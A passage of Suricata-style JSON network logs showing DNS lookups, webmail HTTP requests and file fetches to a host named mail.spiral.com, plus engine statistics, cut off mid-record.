{"timestamp":"2020-02-29T00:02:01.614287+0000","flow_id":1373619292299151,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34201,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":46582,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:01.695422+0000","flow_id":1385872834029786,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41614,"proto":"UDP","dns":{"type":"answer","id":59173,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:01.695422+0000","flow_id":1385872834029786,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41614,"proto":"UDP","dns":{"type":"answer","id":59173,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:01.726419+0000","flow_id":1373619292299151,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34201,"proto":"UDP","dns":{"type":"answer","id":46582,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:01.726419+0000","flow_id":1373619292299151,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34201,"proto":"UDP","dns":{"type":"answer","id":46582,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:01.772272+0000","flow_id":1007666603637629,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52652,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8526}} {"timestamp":"2020-02-29T00:02:01.809666+0000","flow_id":1857713646178395,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34698,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?tasklist=KCDsO_NmBjYX5zVsrCfQDx7&task=eu7ipj_hNihBGhyVt8Xmy50&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8785}} {"timestamp":"2020-02-29T00:02:02.054004+0000","flow_id":1007666603637629,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52652,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8526},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":36694,"tx_id":1}} {"timestamp":"2020-02-29T00:02:02.063370+0000","flow_id":2245411754145674,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56001,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":61179,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:02.174799+0000","flow_id":2245411754145674,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56001,"proto":"UDP","dns":{"type":"answer","id":61179,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:02.174799+0000","flow_id":2245411754145674,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56001,"proto":"UDP","dns":{"type":"answer","id":61179,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:02.260450+0000","flow_id":1007666603637629,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52652,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":908}} {"timestamp":"2020-02-29T00:02:02.260450+0000","flow_id":1007666603637629,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52652,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":908},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":2}} {"timestamp":"2020-02-29T00:02:04.735204+0000","flow_id":1857713646178395,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34698,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?tasklist=KCDsO_NmBjYX5zVsrCfQDx7&task=eu7ipj_hNihBGhyVt8Xmy50&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8785},"app_proto":"http","fileinfo":{"filename":"\/nag\/task.php","state":"CLOSED","stored":false,"size":35363,"tx_id":0}} {"timestamp":"2020-02-29T00:02:04.750794+0000","flow_id":1667395055547594,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59842,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":2110,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:04.861699+0000","flow_id":1667395055547594,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59842,"proto":"UDP","dns":{"type":"answer","id":2110,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:04.861699+0000","flow_id":1667395055547594,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59842,"proto":"UDP","dns":{"type":"answer","id":2110,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:04.970705+0000","flow_id":1857713646178395,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34698,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task\/save.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=KCDsO_NmBjYX5zVsrCfQDx7&task=eu7ipj_hNihBGhyVt8Xmy50&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/nag\/list.php","length":20}} {"timestamp":"2020-02-29T00:02:04.979571+0000","flow_id":69813250355827,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45990,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":26867,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:05.090880+0000","flow_id":69813250355827,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45990,"proto":"UDP","dns":{"type":"answer","id":26867,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:05.090880+0000","flow_id":69813250355827,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45990,"proto":"UDP","dns":{"type":"answer","id":26867,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:06.000378+0000","event_type":"stats","stats":{"uptime":13778,"capture":{"kernel_packets":132438,"kernel_drops":0},"decoder":{"pkts":132444,"bytes":91945109,"invalid":179,"ipv4":131019,"ipv6":8,"ethernet":132444,"raw":0,"null":0,"sll":0,"tcp":126035,"udp":4791,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095904},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2664,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2680,"synack":2671,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":137,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1711,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2185,"failed_udp":106},"tx":{"http":4441,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2261}},"flow_mgr":{"closed_pruned":2641,"new_pruned":15,"est_pruned":2233,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20167,"memcap_state":0,"memcap_global":0},"http":{"memuse":42780,"memcap":0}}} {"timestamp":"2020-02-29T00:02:07.265389+0000","flow_id":1007666603637629,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52652,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":908},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2313,"tx_id":2}} {"timestamp":"2020-02-29T00:02:10.000572+0000","flow_id":915689860042098,"event_type":"flow","src_ip":"192.168.10.122","src_port":50356,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:57:09.200050+0000","end":"2020-02-28T23:57:09.311909+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:02:11.927835+0000","flow_id":1646985371396187,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":52256,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":58265,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:12.039358+0000","flow_id":1646985371396187,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52256,"proto":"UDP","dns":{"type":"answer","id":58265,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:12.039358+0000","flow_id":1646985371396187,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52256,"proto":"UDP","dns":{"type":"answer","id":58265,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:12.119966+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52654,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":361}} {"timestamp":"2020-02-29T00:02:12.119966+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52654,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":361},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":240,"tx_id":0}} {"timestamp":"2020-02-29T00:02:13.000227+0000","event_type":"stats","stats":{"uptime":13785,"capture":{"kernel_packets":132458,"kernel_drops":0},"decoder":{"pkts":132459,"bytes":91954648,"invalid":179,"ipv4":131034,"ipv6":8,"ethernet":132459,"raw":0,"null":0,"sll":0,"tcp":126049,"udp":4792,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2664,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2680,"synack":2671,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":137,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1711,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2185,"failed_udp":106},"tx":{"http":4441,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2261}},"flow_mgr":{"closed_pruned":2641,"new_pruned":15,"est_pruned":2234,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20167,"memcap_state":0,"memcap_global":0},"http":{"memuse":42773,"memcap":0}}} {"timestamp":"2020-02-29T00:02:14.000230+0000","flow_id":296510195100328,"event_type":"flow","src_ip":"192.168.10.122","src_port":39865,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:57:13.060072+0000","end":"2020-02-28T23:57:13.168011+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:02:15.188187+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52654,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":361},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":592,"tx_id":0}} {"timestamp":"2020-02-29T00:02:15.196007+0000","flow_id":1288304062889383,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41386,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":6808,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:15.307685+0000","flow_id":1288304062889383,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41386,"proto":"UDP","dns":{"type":"answer","id":6808,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:15.307685+0000","flow_id":1288304062889383,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41386,"proto":"UDP","dns":{"type":"answer","id":6808,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:15.380900+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52654,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5163}} {"timestamp":"2020-02-29T00:02:15.449100+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52654,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5163},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":17869,"tx_id":1}} {"timestamp":"2020-02-29T00:02:15.453845+0000","flow_id":246860392947698,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52656,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/compose-base.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1833}} {"timestamp":"2020-02-29T00:02:15.456055+0000","flow_id":872675782682226,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52658,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/ckeditor\/imageupload.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":867}} {"timestamp":"2020-02-29T00:02:15.457505+0000","flow_id":246860392947698,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52656,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/compose-base.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1833},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/compose-base.js","state":"CLOSED","stored":false,"size":5941,"tx_id":0}} {"timestamp":"2020-02-29T00:02:15.456227+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52654,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/keynavlist.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2499}} {"timestamp":"2020-02-29T00:02:15.460235+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52660,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/compose-dimp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":10281}} {"timestamp":"2020-02-29T00:02:15.464545+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52660,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/compose-dimp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":10281},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/compose-dimp.js","state":"CLOSED","stored":false,"size":46315,"tx_id":0}} {"timestamp":"2020-02-29T00:02:15.465098+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52654,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/keynavlist.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2499},"app_proto":"http","fileinfo":{"filename":"\/js\/keynavlist.js","state":"CLOSED","stored":false,"size":8737,"tx_id":2}} {"timestamp":"2020-02-29T00:02:15.465224+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52660,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/draghandler.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":908}} {"timestamp":"2020-02-29T00:02:15.466791+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52654,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/editor.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":712}} {"timestamp":"2020-02-29T00:02:15.467689+0000","flow_id":246860392947698,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52656,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/ckeditor\/imagepoll.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":795}} {"timestamp":"2020-02-29T00:02:15.469165+0000","flow_id":246860392947698,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52656,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/ckeditor\/imagepoll.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 